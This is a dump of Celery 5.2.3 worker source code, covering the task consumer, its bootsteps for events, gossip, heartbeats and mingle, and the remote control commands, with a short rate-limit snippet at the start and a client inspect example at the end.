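fill_rate = rate('10/m')                 # 10 tasks per minute -> tasks/sec
bucket = TokenBucket(fill_rate, capacity=1)

if bucket.can_consume(1):
    pass                                 # token available: hand off to the pool now
else:
    delay = bucket.expected_time(1)      # seconds until the next token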
self.task_buckets = defaultdict(lambda: None) self.reset_rate_limits() self.hub = hub if self.hub or getattr(self.pool, 'is_green', False): self.amqheartbeat = amqheartbeat if self.amqheartbeat is None: self.amqheartbeat = self.app.conf.broker_heartbeat else: self.amqheartbeat = 0 if not hasattr(self, 'loop'): self.loop = loops.asynloop if hub else loops.synloop if _detect_environment() == 'gevent': # there's a gevent bug that causes timeouts to not be reset, # so if the connection timeout is exceeded once, it can NEVER # connect again. self.app.conf.broker_connection_timeout = None self._pending_operations = [] self.steps = [] self.blueprint = self.Blueprint( steps=self.app.steps['consumer'], on_close=self.on_close, ) self.blueprint.apply(self, **dict(worker_options or {}, **kwargs)) def call_soon(self, p, *args, **kwargs): p = ppartial(p, *args, **kwargs) if self.hub: return self.hub.call_soon(p) self._pending_operations.append(p) return p def perform_pending_operations(self): if not self.hub: while self._pending_operations: try: self._pending_operations.pop()() except Exception as exc: # pylint: disable=broad-except logger.exception('Pending callback raised: %r', exc) def bucket_for_task(self, type): limit = rate(getattr(type, 'rate_limit', None)) return TokenBucket(limit, capacity=1) if limit else None def reset_rate_limits(self): self.task_buckets.update( (n, self.bucket_for_task(t)) for n, t in self.app.tasks.items() ) def _update_prefetch_count(self, index=0): """Update prefetch count after pool/shrink grow operations. Index must be the change in number of processes as a positive (increasing) or negative (decreasing) number. Note: Currently pool grow operations will end up with an offset of +1 if the initial size of the pool was 0 (e.g. :option:`--autoscale=1,0 `). """ num_processes = self.pool.num_processes if not self.initial_prefetch_count or not num_processes: return # prefetch disabled self.initial_prefetch_count = ( self.pool.num_processes * self.prefetch_multiplier ) return self._update_qos_eventually(index) def _update_qos_eventually(self, index): return (self.qos.decrement_eventually if index < 0 else self.qos.increment_eventually)( abs(index) * self.prefetch_multiplier) def _limit_move_to_pool(self, request): task_reserved(request) self.on_task_request(request) def _schedule_bucket_request(self, bucket): while True: try: request, tokens = bucket.pop() except IndexError: # no request, break break if bucket.can_consume(tokens): self._limit_move_to_pool(request) continue else: # requeue to head, keep the order. 
bucket.contents.appendleft((request, tokens)) pri = self._limit_order = (self._limit_order + 1) % 10 hold = bucket.expected_time(tokens) self.timer.call_after( hold, self._schedule_bucket_request, (bucket,), priority=pri, ) # no tokens, break break def _limit_task(self, request, bucket, tokens): bucket.add((request, tokens)) return self._schedule_bucket_request(bucket) def _limit_post_eta(self, request, bucket, tokens): self.qos.decrement_eventually() bucket.add((request, tokens)) return self._schedule_bucket_request(bucket) def start(self): blueprint = self.blueprint while blueprint.state not in STOP_CONDITIONS: maybe_shutdown() if self.restart_count: try: self._restart_state.step() except RestartFreqExceeded as exc: crit('Frequent restarts detected: %r', exc, exc_info=1) sleep(1) self.restart_count += 1 try: blueprint.start(self) except self.connection_errors as exc: # If we're not retrying connections, no need to catch # connection errors if not self.app.conf.broker_connection_retry: raise if isinstance(exc, OSError) and exc.errno == errno.EMFILE: raise # Too many open files maybe_shutdown() if blueprint.state not in STOP_CONDITIONS: if self.connection: self.on_connection_error_after_connected(exc) else: self.on_connection_error_before_connected(exc) self.on_close() blueprint.restart(self) def on_connection_error_before_connected(self, exc): error(CONNECTION_ERROR, self.conninfo.as_uri(), exc, 'Trying to reconnect...') def on_connection_error_after_connected(self, exc): warn(CONNECTION_RETRY, exc_info=True) try: self.connection.collect() except Exception: # pylint: disable=broad-except pass if self.app.conf.worker_cancel_long_running_tasks_on_connection_loss: for request in tuple(active_requests): if request.task.acks_late and not request.acknowledged: warn(TERMINATING_TASK_ON_RESTART_AFTER_A_CONNECTION_LOSS, request) request.cancel(self.pool) else: warnings.warn(CANCEL_TASKS_BY_DEFAULT, CPendingDeprecationWarning) def register_with_event_loop(self, hub): self.blueprint.send_all( self, 'register_with_event_loop', args=(hub,), description='Hub.register', ) def shutdown(self): self.blueprint.shutdown(self) def stop(self): self.blueprint.stop(self) def on_ready(self): callback, self.init_callback = self.init_callback, None if callback: callback(self) def loop_args(self): return (self, self.connection, self.task_consumer, self.blueprint, self.hub, self.qos, self.amqheartbeat, self.app.clock, self.amqheartbeat_rate) def on_decode_error(self, message, exc): """Callback called if an error occurs while decoding a message. Simply logs the error and acknowledges the message so it doesn't enter a loop. Arguments: message (kombu.Message): The message received. exc (Exception): The exception being handled. """ crit(MESSAGE_DECODE_ERROR, exc, message.content_type, message.content_encoding, safe_repr(message.headers), dump_body(message, message.body), exc_info=1) message.ack() def on_close(self): # Clear internal queues to get rid of old messages. # They can't be acked anyway, as a delivery tag is specific # to the current channel. if self.controller and self.controller.semaphore: self.controller.semaphore.clear() if self.timer: self.timer.clear() for bucket in self.task_buckets.values(): if bucket: bucket.clear_pending() reserved_requests.clear() if self.pool and self.pool.flush: self.pool.flush() def connect(self): """Establish the broker connection used for consuming tasks. 
Retries establishing the connection if the :setting:`broker_connection_retry` setting is enabled """ conn = self.connection_for_read(heartbeat=self.amqheartbeat) if self.hub: conn.transport.register_with_event_loop(conn.connection, self.hub) return conn def connection_for_read(self, heartbeat=None): return self.ensure_connected( self.app.connection_for_read(heartbeat=heartbeat)) def connection_for_write(self, heartbeat=None): return self.ensure_connected( self.app.connection_for_write(heartbeat=heartbeat)) def ensure_connected(self, conn): # Callback called for each retry while the connection # can't be established. def _error_handler(exc, interval, next_step=CONNECTION_RETRY_STEP): if getattr(conn, 'alt', None) and interval == 0: next_step = CONNECTION_FAILOVER next_step = next_step.format( when=humanize_seconds(interval, 'in', ' '), retries=int(interval / 2), max_retries=self.app.conf.broker_connection_max_retries) error(CONNECTION_ERROR, conn.as_uri(), exc, next_step) # remember that the connection is lazy, it won't establish # until needed. if not self.app.conf.broker_connection_retry: # retry disabled, just call connect directly. conn.connect() return conn conn = conn.ensure_connection( _error_handler, self.app.conf.broker_connection_max_retries, callback=maybe_shutdown, ) return conn def _flush_events(self): if self.event_dispatcher: self.event_dispatcher.flush() def on_send_event_buffered(self): if self.hub: self.hub._ready.add(self._flush_events) def add_task_queue(self, queue, exchange=None, exchange_type=None, routing_key=None, **options): cset = self.task_consumer queues = self.app.amqp.queues # Must use in' here, as __missing__ will automatically # create queues when :setting:`task_create_missing_queues` is enabled. # (Issue #1079) if queue in queues: q = queues[queue] else: exchange = queue if exchange is None else exchange exchange_type = ('direct' if exchange_type is None else exchange_type) q = queues.select_add(queue, exchange=exchange, exchange_type=exchange_type, routing_key=routing_key, **options) if not cset.consuming_from(queue): cset.add_queue(q) cset.consume() info('Started consuming from %s', queue) def cancel_task_queue(self, queue): info('Canceling queue %s', queue) self.app.amqp.queues.deselect(queue) self.task_consumer.cancel_by_queue(queue) def apply_eta_task(self, task): """Method called by the timer to apply a task with an ETA/countdown.""" task_reserved(task) self.on_task_request(task) self.qos.decrement_eventually() def _message_report(self, body, message): return MESSAGE_REPORT.format(dump_body(message, body), safe_repr(message.content_type), safe_repr(message.content_encoding), safe_repr(message.delivery_info), safe_repr(message.headers)) def on_unknown_message(self, body, message): warn(UNKNOWN_FORMAT, self._message_report(body, message)) message.reject_log_error(logger, self.connection_errors) signals.task_rejected.send(sender=self, message=message, exc=None) def on_unknown_task(self, body, message, exc): error(UNKNOWN_TASK_ERROR, exc, dump_body(message, body), exc_info=True) try: id_, name = message.headers['id'], message.headers['task'] root_id = message.headers.get('root_id') except KeyError: # proto1 payload = message.payload id_, name = payload['id'], payload['task'] root_id = None request = Bunch( name=name, chord=None, root_id=root_id, correlation_id=message.properties.get('correlation_id'), reply_to=message.properties.get('reply_to'), errbacks=None, ) message.reject_log_error(logger, self.connection_errors) self.app.backend.mark_as_failure( 
id_, NotRegistered(name), request=request, ) if self.event_dispatcher: self.event_dispatcher.send( 'task-failed', uuid=id_, exception=f'NotRegistered({name!r})', ) signals.task_unknown.send( sender=self, message=message, exc=exc, name=name, id=id_, ) def on_invalid_task(self, body, message, exc): error(INVALID_TASK_ERROR, exc, dump_body(message, body), exc_info=True) message.reject_log_error(logger, self.connection_errors) signals.task_rejected.send(sender=self, message=message, exc=exc) def update_strategies(self): loader = self.app.loader for name, task in self.app.tasks.items(): self.strategies[name] = task.start_strategy(self.app, self) task.__trace__ = build_tracer(name, task, loader, self.hostname, app=self.app) def create_task_handler(self, promise=promise): strategies = self.strategies on_unknown_message = self.on_unknown_message on_unknown_task = self.on_unknown_task on_invalid_task = self.on_invalid_task callbacks = self.on_task_message call_soon = self.call_soon def on_task_received(message): # payload will only be set for v1 protocol, since v2 # will defer deserializing the message body to the pool. payload = None try: type_ = message.headers['task'] # protocol v2 except TypeError: return on_unknown_message(None, message) except KeyError: try: payload = message.decode() except Exception as exc: # pylint: disable=broad-except return self.on_decode_error(message, exc) try: type_, payload = payload['task'], payload # protocol v1 except (TypeError, KeyError): return on_unknown_message(payload, message) try: strategy = strategies[type_] except KeyError as exc: return on_unknown_task(None, message, exc) else: try: strategy( message, payload, promise(call_soon, (message.ack_log_error,)), promise(call_soon, (message.reject_log_error,)), callbacks, ) except (InvalidTaskError, ContentDisallowed) as exc: return on_invalid_task(payload, message, exc) except DecodeError as exc: return self.on_decode_error(message, exc) return on_task_received def __repr__(self): """``repr(self)``.""" return ''.format( self=self, state=self.blueprint.human_state(), ) class Evloop(bootsteps.StartStopStep): """Event loop service. Note: This is always started last. """ label = 'event loop' last = True def start(self, c): self.patch_all(c) c.loop(*c.loop_args()) def patch_all(self, c): c.qos._mutex = DummyLock() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/worker/consumer/control.py0000664000175000017500000000166200000000000021363 0ustar00asifasif00000000000000"""Worker Remote Control Bootstep. ``Control`` -> :mod:`celery.worker.pidbox` -> :mod:`kombu.pidbox`. The actual commands are implemented in :mod:`celery.worker.control`. 
""" from celery import bootsteps from celery.utils.log import get_logger from celery.worker import pidbox from .tasks import Tasks __all__ = ('Control',) logger = get_logger(__name__) class Control(bootsteps.StartStopStep): """Remote control command service.""" requires = (Tasks,) def __init__(self, c, **kwargs): self.is_green = c.pool is not None and c.pool.is_green self.box = (pidbox.gPidbox if self.is_green else pidbox.Pidbox)(c) self.start = self.box.start self.stop = self.box.stop self.shutdown = self.box.shutdown super().__init__(c, **kwargs) def include_if(self, c): return (c.app.conf.worker_enable_remote_control and c.conninfo.supports_exchange_type('fanout')) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/worker/consumer/events.py0000664000175000017500000000400600000000000021202 0ustar00asifasif00000000000000"""Worker Event Dispatcher Bootstep. ``Events`` -> :class:`celery.events.EventDispatcher`. """ from kombu.common import ignore_errors from celery import bootsteps from .connection import Connection __all__ = ('Events',) class Events(bootsteps.StartStopStep): """Service used for sending monitoring events.""" requires = (Connection,) def __init__(self, c, task_events=True, without_heartbeat=False, without_gossip=False, **kwargs): self.groups = None if task_events else ['worker'] self.send_events = ( task_events or not without_gossip or not without_heartbeat ) self.enabled = self.send_events c.event_dispatcher = None super().__init__(c, **kwargs) def start(self, c): # flush events sent while connection was down. prev = self._close(c) dis = c.event_dispatcher = c.app.events.Dispatcher( c.connection_for_write(), hostname=c.hostname, enabled=self.send_events, groups=self.groups, # we currently only buffer events when the event loop is enabled # XXX This excludes eventlet/gevent, which should actually buffer. buffer_group=['task'] if c.hub else None, on_send_buffered=c.on_send_event_buffered if c.hub else None, ) if prev: dis.extend_buffer(prev) dis.flush() def stop(self, c): pass def _close(self, c): if c.event_dispatcher: dispatcher = c.event_dispatcher # remember changes from remote control commands: self.groups = dispatcher.groups # close custom connection if dispatcher.connection: ignore_errors(c, dispatcher.connection.close) ignore_errors(c, dispatcher.close) c.event_dispatcher = None return dispatcher def shutdown(self, c): self._close(c) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/worker/consumer/gossip.py0000664000175000017500000001526100000000000021207 0ustar00asifasif00000000000000"""Worker <-> Worker communication Bootstep.""" from collections import defaultdict from functools import partial from heapq import heappush from operator import itemgetter from kombu import Consumer from kombu.asynchronous.semaphore import DummyLock from kombu.exceptions import ContentDisallowed, DecodeError from celery import bootsteps from celery.utils.log import get_logger from celery.utils.objects import Bunch from .mingle import Mingle __all__ = ('Gossip',) logger = get_logger(__name__) debug, info = logger.debug, logger.info class Gossip(bootsteps.ConsumerStep): """Bootstep consuming events from other workers. This keeps the logical clock value up to date. 
""" label = 'Gossip' requires = (Mingle,) _cons_stamp_fields = itemgetter( 'id', 'clock', 'hostname', 'pid', 'topic', 'action', 'cver', ) compatible_transports = {'amqp', 'redis'} def __init__(self, c, without_gossip=False, interval=5.0, heartbeat_interval=2.0, **kwargs): self.enabled = not without_gossip and self.compatible_transport(c.app) self.app = c.app c.gossip = self self.Receiver = c.app.events.Receiver self.hostname = c.hostname self.full_hostname = '.'.join([self.hostname, str(c.pid)]) self.on = Bunch( node_join=set(), node_leave=set(), node_lost=set(), ) self.timer = c.timer if self.enabled: self.state = c.app.events.State( on_node_join=self.on_node_join, on_node_leave=self.on_node_leave, max_tasks_in_memory=1, ) if c.hub: c._mutex = DummyLock() self.update_state = self.state.event self.interval = interval self.heartbeat_interval = heartbeat_interval self._tref = None self.consensus_requests = defaultdict(list) self.consensus_replies = {} self.event_handlers = { 'worker.elect': self.on_elect, 'worker.elect.ack': self.on_elect_ack, } self.clock = c.app.clock self.election_handlers = { 'task': self.call_task } super().__init__(c, **kwargs) def compatible_transport(self, app): with app.connection_for_read() as conn: return conn.transport.driver_type in self.compatible_transports def election(self, id, topic, action=None): self.consensus_replies[id] = [] self.dispatcher.send( 'worker-elect', id=id, topic=topic, action=action, cver=1, ) def call_task(self, task): try: self.app.signature(task).apply_async() except Exception as exc: # pylint: disable=broad-except logger.exception('Could not call task: %r', exc) def on_elect(self, event): try: (id_, clock, hostname, pid, topic, action, _) = self._cons_stamp_fields(event) except KeyError as exc: return logger.exception('election request missing field %s', exc) heappush( self.consensus_requests[id_], (clock, f'{hostname}.{pid}', topic, action), ) self.dispatcher.send('worker-elect-ack', id=id_) def start(self, c): super().start(c) self.dispatcher = c.event_dispatcher def on_elect_ack(self, event): id = event['id'] try: replies = self.consensus_replies[id] except KeyError: return # not for us alive_workers = set(self.state.alive_workers()) replies.append(event['hostname']) if len(replies) >= len(alive_workers): _, leader, topic, action = self.clock.sort_heap( self.consensus_requests[id], ) if leader == self.full_hostname: info('I won the election %r', id) try: handler = self.election_handlers[topic] except KeyError: logger.exception('Unknown election topic %r', topic) else: handler(action) else: info('node %s elected for %r', leader, id) self.consensus_requests.pop(id, None) self.consensus_replies.pop(id, None) def on_node_join(self, worker): debug('%s joined the party', worker.hostname) self._call_handlers(self.on.node_join, worker) def on_node_leave(self, worker): debug('%s left', worker.hostname) self._call_handlers(self.on.node_leave, worker) def on_node_lost(self, worker): info('missed heartbeat from %s', worker.hostname) self._call_handlers(self.on.node_lost, worker) def _call_handlers(self, handlers, *args, **kwargs): for handler in handlers: try: handler(*args, **kwargs) except Exception as exc: # pylint: disable=broad-except logger.exception( 'Ignored error from handler %r: %r', handler, exc) def register_timer(self): if self._tref is not None: self._tref.cancel() self._tref = self.timer.call_repeatedly(self.interval, self.periodic) def periodic(self): workers = self.state.workers dirty = set() for worker in workers.values(): if 
not worker.alive: dirty.add(worker) self.on_node_lost(worker) for worker in dirty: workers.pop(worker.hostname, None) def get_consumers(self, channel): self.register_timer() ev = self.Receiver(channel, routing_key='worker.#', queue_ttl=self.heartbeat_interval) return [Consumer( channel, queues=[ev.queue], on_message=partial(self.on_message, ev.event_from_message), no_ack=True )] def on_message(self, prepare, message): _type = message.delivery_info['routing_key'] # For redis when `fanout_patterns=False` (See Issue #1882) if _type.split('.', 1)[0] == 'task': return try: handler = self.event_handlers[_type] except KeyError: pass else: return handler(message.payload) # proto2: hostname in header; proto1: in body hostname = (message.headers.get('hostname') or message.payload['hostname']) if hostname != self.hostname: try: _, event = prepare(message.payload) self.update_state(event) except (DecodeError, ContentDisallowed, TypeError) as exc: logger.error(exc) else: self.clock.forward() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/worker/consumer/heart.py0000664000175000017500000000164200000000000021004 0ustar00asifasif00000000000000"""Worker Event Heartbeat Bootstep.""" from celery import bootsteps from celery.worker import heartbeat from .events import Events __all__ = ('Heart',) class Heart(bootsteps.StartStopStep): """Bootstep sending event heartbeats. This service sends a ``worker-heartbeat`` message every n seconds. Note: Not to be confused with AMQP protocol level heartbeats. """ requires = (Events,) def __init__(self, c, without_heartbeat=False, heartbeat_interval=None, **kwargs): self.enabled = not without_heartbeat self.heartbeat_interval = heartbeat_interval c.heart = None super().__init__(c, **kwargs) def start(self, c): c.heart = heartbeat.Heart( c.timer, c.event_dispatcher, self.heartbeat_interval, ) c.heart.start() def stop(self, c): c.heart = c.heart and c.heart.stop() shutdown = stop ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/worker/consumer/mingle.py0000664000175000017500000000472700000000000021163 0ustar00asifasif00000000000000"""Worker <-> Worker Sync at startup (Bootstep).""" from celery import bootsteps from celery.utils.log import get_logger from .events import Events __all__ = ('Mingle',) logger = get_logger(__name__) debug, info, exception = logger.debug, logger.info, logger.exception class Mingle(bootsteps.StartStopStep): """Bootstep syncing state with neighbor workers. At startup, or upon consumer restart, this will: - Sync logical clocks. - Sync revoked tasks. 
""" label = 'Mingle' requires = (Events,) compatible_transports = {'amqp', 'redis'} def __init__(self, c, without_mingle=False, **kwargs): self.enabled = not without_mingle and self.compatible_transport(c.app) super().__init__( c, without_mingle=without_mingle, **kwargs) def compatible_transport(self, app): with app.connection_for_read() as conn: return conn.transport.driver_type in self.compatible_transports def start(self, c): self.sync(c) def sync(self, c): info('mingle: searching for neighbors') replies = self.send_hello(c) if replies: info('mingle: sync with %s nodes', len([reply for reply, value in replies.items() if value])) [self.on_node_reply(c, nodename, reply) for nodename, reply in replies.items() if reply] info('mingle: sync complete') else: info('mingle: all alone') def send_hello(self, c): inspect = c.app.control.inspect(timeout=1.0, connection=c.connection) our_revoked = c.controller.state.revoked replies = inspect.hello(c.hostname, our_revoked._data) or {} replies.pop(c.hostname, None) # delete my own response return replies def on_node_reply(self, c, nodename, reply): debug('mingle: processing reply from %s', nodename) try: self.sync_with_node(c, **reply) except MemoryError: raise except Exception as exc: # pylint: disable=broad-except exception('mingle: sync with %s failed: %r', nodename, exc) def sync_with_node(self, c, clock=None, revoked=None, **kwargs): self.on_clock_event(c, clock) self.on_revoked_received(c, revoked) def on_clock_event(self, c, clock): c.app.clock.adjust(clock) if clock else c.app.clock.forward() def on_revoked_received(self, c, revoked): if revoked: c.controller.state.revoked.update(revoked) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/worker/consumer/tasks.py0000664000175000017500000000364700000000000021035 0ustar00asifasif00000000000000"""Worker Task Consumer Bootstep.""" from kombu.common import QoS, ignore_errors from celery import bootsteps from celery.utils.log import get_logger from .mingle import Mingle __all__ = ('Tasks',) logger = get_logger(__name__) debug = logger.debug class Tasks(bootsteps.StartStopStep): """Bootstep starting the task message consumer.""" requires = (Mingle,) def __init__(self, c, **kwargs): c.task_consumer = c.qos = None super().__init__(c, **kwargs) def start(self, c): """Start task consumer.""" c.update_strategies() # - RabbitMQ 3.3 completely redefines how basic_qos works.. # This will detect if the new qos smenatics is in effect, # and if so make sure the 'apply_global' flag is set on qos updates. 
qos_global = not c.connection.qos_semantics_matches_spec # set initial prefetch count c.connection.default_channel.basic_qos( 0, c.initial_prefetch_count, qos_global, ) c.task_consumer = c.app.amqp.TaskConsumer( c.connection, on_decode_error=c.on_decode_error, ) def set_prefetch_count(prefetch_count): return c.task_consumer.qos( prefetch_count=prefetch_count, apply_global=qos_global, ) c.qos = QoS(set_prefetch_count, c.initial_prefetch_count) def stop(self, c): """Stop task consumer.""" if c.task_consumer: debug('Canceling task consumer...') ignore_errors(c, c.task_consumer.cancel) def shutdown(self, c): """Shutdown task consumer.""" if c.task_consumer: self.stop(c) debug('Closing consumer channel...') ignore_errors(c, c.task_consumer.close) c.task_consumer = None def info(self, c): """Return task consumer info.""" return {'prefetch_count': c.qos.value if c.qos else 'N/A'} ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/worker/control.py0000664000175000017500000004076500000000000017537 0ustar00asifasif00000000000000"""Worker remote control command implementations.""" import io import tempfile from collections import UserDict, namedtuple from billiard.common import TERM_SIGNAME from kombu.utils.encoding import safe_repr from celery.exceptions import WorkerShutdown from celery.platforms import signals as _signals from celery.utils.functional import maybe_list from celery.utils.log import get_logger from celery.utils.serialization import jsonify, strtobool from celery.utils.time import rate from . import state as worker_state from .request import Request __all__ = ('Panel',) DEFAULT_TASK_INFO_ITEMS = ('exchange', 'routing_key', 'rate_limit') logger = get_logger(__name__) controller_info_t = namedtuple('controller_info_t', [ 'alias', 'type', 'visible', 'default_timeout', 'help', 'signature', 'args', 'variadic', ]) def ok(value): return {'ok': value} def nok(value): return {'error': value} class Panel(UserDict): """Global registry of remote control commands.""" data = {} # global dict. meta = {} # -"- @classmethod def register(cls, *args, **kwargs): if args: return cls._register(**kwargs)(*args) return cls._register(**kwargs) @classmethod def _register(cls, name=None, alias=None, type='control', visible=True, default_timeout=1.0, help=None, signature=None, args=None, variadic=None): def _inner(fun): control_name = name or fun.__name__ _help = help or (fun.__doc__ or '').strip().split('\n')[0] cls.data[control_name] = fun cls.meta[control_name] = controller_info_t( alias, type, visible, default_timeout, _help, signature, args, variadic) if alias: cls.data[alias] = fun return fun return _inner def control_command(**kwargs): return Panel.register(type='control', **kwargs) def inspect_command(**kwargs): return Panel.register(type='inspect', **kwargs) # -- App @inspect_command() def report(state): """Information about Celery installation for bug reports.""" return ok(state.app.bugreport()) @inspect_command( alias='dump_conf', # XXX < backwards compatible signature='[include_defaults=False]', args=[('with_defaults', strtobool)], ) def conf(state, with_defaults=False, **kwargs): """List configuration.""" return jsonify(state.app.conf.table(with_defaults=with_defaults), keyfilter=_wanted_config_key, unknown_type_filter=safe_repr) def _wanted_config_key(key): return isinstance(key, str) and not key.startswith('__') # -- Task @inspect_command( variadic='ids', signature='[id1 [id2 [... 
[idN]]]]', ) def query_task(state, ids, **kwargs): """Query for task information by id.""" return { req.id: (_state_of_task(req), req.info()) for req in _find_requests_by_id(maybe_list(ids)) } def _find_requests_by_id(ids, get_request=worker_state.requests.__getitem__): for task_id in ids: try: yield get_request(task_id) except KeyError: pass def _state_of_task(request, is_active=worker_state.active_requests.__contains__, is_reserved=worker_state.reserved_requests.__contains__): if is_active(request): return 'active' elif is_reserved(request): return 'reserved' return 'ready' @control_command( variadic='task_id', signature='[id1 [id2 [... [idN]]]]', ) def revoke(state, task_id, terminate=False, signal=None, **kwargs): """Revoke task by task id (or list of ids). Keyword Arguments: terminate (bool): Also terminate the process if the task is active. signal (str): Name of signal to use for terminate (e.g., ``KILL``). """ # pylint: disable=redefined-outer-name # XXX Note that this redefines `terminate`: # Outside of this scope that is a function. # supports list argument since 3.1 task_ids, task_id = set(maybe_list(task_id) or []), None size = len(task_ids) terminated = set() worker_state.revoked.update(task_ids) if terminate: signum = _signals.signum(signal or TERM_SIGNAME) for request in _find_requests_by_id(task_ids): if request.id not in terminated: terminated.add(request.id) logger.info('Terminating %s (%s)', request.id, signum) request.terminate(state.consumer.pool, signal=signum) if len(terminated) >= size: break if not terminated: return ok('terminate: tasks unknown') return ok('terminate: {}'.format(', '.join(terminated))) idstr = ', '.join(task_ids) logger.info('Tasks flagged as revoked: %s', idstr) return ok(f'tasks {idstr} flagged as revoked') @control_command( variadic='task_id', args=[('signal', str)], signature=' [id1 [id2 [... [idN]]]]' ) def terminate(state, signal, task_id, **kwargs): """Terminate task by task id (or list of ids).""" return revoke(state, task_id, terminate=True, signal=signal) @control_command( args=[('task_name', str), ('rate_limit', str)], signature=' ', ) def rate_limit(state, task_name, rate_limit, **kwargs): """Tell worker(s) to modify the rate limit for a task by type. See Also: :attr:`celery.app.task.Task.rate_limit`. Arguments: task_name (str): Type of task to set rate limit for. rate_limit (int, str): New rate limit. """ # pylint: disable=redefined-outer-name # XXX Note that this redefines `terminate`: # Outside of this scope that is a function. try: rate(rate_limit) except ValueError as exc: return nok(f'Invalid rate limit string: {exc!r}') try: state.app.tasks[task_name].rate_limit = rate_limit except KeyError: logger.error('Rate limit attempt for unknown task %s', task_name, exc_info=True) return nok('unknown task') state.consumer.reset_rate_limits() if not rate_limit: logger.info('Rate limits disabled for tasks of type %s', task_name) return ok('rate limit disabled successfully') logger.info('New rate limit for tasks of type %s: %s.', task_name, rate_limit) return ok('new rate limit set successfully') @control_command( args=[('task_name', str), ('soft', float), ('hard', float)], signature=' [hard_secs]', ) def time_limit(state, task_name=None, hard=None, soft=None, **kwargs): """Tell worker(s) to modify the time limit for task by type. Arguments: task_name (str): Name of task to change. hard (float): Hard time limit. soft (float): Soft time limit. 
""" try: task = state.app.tasks[task_name] except KeyError: logger.error('Change time limit attempt for unknown task %s', task_name, exc_info=True) return nok('unknown task') task.soft_time_limit = soft task.time_limit = hard logger.info('New time limits for tasks of type %s: soft=%s hard=%s', task_name, soft, hard) return ok('time limits set successfully') # -- Events @inspect_command() def clock(state, **kwargs): """Get current logical clock value.""" return {'clock': state.app.clock.value} @control_command() def election(state, id, topic, action=None, **kwargs): """Hold election. Arguments: id (str): Unique election id. topic (str): Election topic. action (str): Action to take for elected actor. """ if state.consumer.gossip: state.consumer.gossip.election(id, topic, action) @control_command() def enable_events(state): """Tell worker(s) to send task-related events.""" dispatcher = state.consumer.event_dispatcher if dispatcher.groups and 'task' not in dispatcher.groups: dispatcher.groups.add('task') logger.info('Events of group {task} enabled by remote.') return ok('task events enabled') return ok('task events already enabled') @control_command() def disable_events(state): """Tell worker(s) to stop sending task-related events.""" dispatcher = state.consumer.event_dispatcher if 'task' in dispatcher.groups: dispatcher.groups.discard('task') logger.info('Events of group {task} disabled by remote.') return ok('task events disabled') return ok('task events already disabled') @control_command() def heartbeat(state): """Tell worker(s) to send event heartbeat immediately.""" logger.debug('Heartbeat requested by remote.') dispatcher = state.consumer.event_dispatcher dispatcher.send('worker-heartbeat', freq=5, **worker_state.SOFTWARE_INFO) # -- Worker @inspect_command(visible=False) def hello(state, from_node, revoked=None, **kwargs): """Request mingle sync-data.""" # pylint: disable=redefined-outer-name # XXX Note that this redefines `revoked`: # Outside of this scope that is a function. if from_node != state.hostname: logger.info('sync with %s', from_node) if revoked: worker_state.revoked.update(revoked) # Do not send expired items to the other worker. 
worker_state.revoked.purge() return { 'revoked': worker_state.revoked._data, 'clock': state.app.clock.forward(), } @inspect_command(default_timeout=0.2) def ping(state, **kwargs): """Ping worker(s).""" return ok('pong') @inspect_command() def stats(state, **kwargs): """Request worker statistics/information.""" return state.consumer.controller.stats() @inspect_command(alias='dump_schedule') def scheduled(state, **kwargs): """List of currently scheduled ETA/countdown tasks.""" return list(_iter_schedule_requests(state.consumer.timer)) def _iter_schedule_requests(timer): for waiting in timer.schedule.queue: try: arg0 = waiting.entry.args[0] except (IndexError, TypeError): continue else: if isinstance(arg0, Request): yield { 'eta': arg0.eta.isoformat() if arg0.eta else None, 'priority': waiting.priority, 'request': arg0.info(), } @inspect_command(alias='dump_reserved') def reserved(state, **kwargs): """List of currently reserved tasks, not including scheduled/active.""" reserved_tasks = ( state.tset(worker_state.reserved_requests) - state.tset(worker_state.active_requests) ) if not reserved_tasks: return [] return [request.info() for request in reserved_tasks] @inspect_command(alias='dump_active') def active(state, safe=False, **kwargs): """List of tasks currently being executed.""" return [request.info(safe=safe) for request in state.tset(worker_state.active_requests)] @inspect_command(alias='dump_revoked') def revoked(state, **kwargs): """List of revoked task-ids.""" return list(worker_state.revoked) @inspect_command( alias='dump_tasks', variadic='taskinfoitems', signature='[attr1 [attr2 [... [attrN]]]]', ) def registered(state, taskinfoitems=None, builtins=False, **kwargs): """List of registered tasks. Arguments: taskinfoitems (Sequence[str]): List of task attributes to include. Defaults to ``exchange,routing_key,rate_limit``. builtins (bool): Also include built-in tasks. """ reg = state.app.tasks taskinfoitems = taskinfoitems or DEFAULT_TASK_INFO_ITEMS tasks = reg if builtins else ( task for task in reg if not task.startswith('celery.')) def _extract_info(task): fields = { field: str(getattr(task, field, None)) for field in taskinfoitems if getattr(task, field, None) is not None } if fields: info = ['='.join(f) for f in fields.items()] return '{} [{}]'.format(task.name, ' '.join(info)) return task.name return [_extract_info(reg[task]) for task in sorted(tasks)] # -- Debugging @inspect_command( default_timeout=60.0, args=[('type', str), ('num', int), ('max_depth', int)], signature='[object_type=Request] [num=200 [max_depth=10]]', ) def objgraph(state, num=200, max_depth=10, type='Request'): # pragma: no cover """Create graph of uncollected objects (memory-leak debugging). Arguments: num (int): Max number of objects to graph. max_depth (int): Traverse at most n levels deep. type (str): Name of object to graph. Default is ``"Request"``. 
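# Illustrative client-side sketch (not part of this module): the inspect
# commands defined in this file are normally reached through the control
# API.  Assumes a running worker; the app name and broker URL are examples.
from celery import Celery

app = Celery('proj', broker='amqp://')
insp = app.control.inspect(timeout=1.0)

insp.ping()         # -> {'worker1@host': {'ok': 'pong'}}
insp.active()       # tasks currently being executed
insp.reserved()     # prefetched tasks not yet started
insp.scheduled()    # ETA/countdown tasks held by the timer
insp.stats()        # worker statistics
insp.registered()   # registered task names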
